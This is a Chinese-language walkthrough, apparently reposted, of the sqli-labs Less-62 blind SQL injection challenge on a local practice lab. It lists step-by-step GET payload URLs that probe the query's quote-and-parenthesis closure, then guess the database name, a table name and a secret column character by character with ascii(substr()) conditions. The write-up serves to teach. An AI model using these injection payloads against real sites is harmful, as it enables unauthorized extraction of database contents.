sqli-labs less62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型 挑战 盲注 只允许130次查询 变化1)(代

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型 挑战 盲注 只允许130次查询 变化1)(代相关的知识,希望对你有一定的参考价值。

 

技术分享图片

允许130次尝试,然后是个盲注漏洞,看来要单字符猜解了

技术分享图片

加单引号,页面异常,但报错被屏蔽了

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘

技术分享图片

加注释符,说名不止是用单引号闭合

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘%23

技术分享图片

加单括号,页面恢复正常

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘)%23

技术分享图片

猜解数据库名

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘) and ascii(substr((select database()),1,1))=98%23

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘) and ascii(substr((select database()),1,1))=99%23

技术分享图片

数据库第一位字符为ascii=99的字符,即‘c‘

表名第一位字符‘W‘

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘) and ascii(substr((select table_name from information_schema.tables where table_schema=‘challenges‘),1,1))=87%23

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-62/?id=1‘) and ascii(substr((select secret_1O45 from WOJXNS9PWT),1,1))=49%23

技术分享图片

 

以上是关于sqli-labs less62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型 挑战 盲注 只允许130次查询 变化1)(代的主要内容,如果未能解决你的问题,请参考以下文章

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

SQLI-LABS 靶场通过小记(54~65)

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)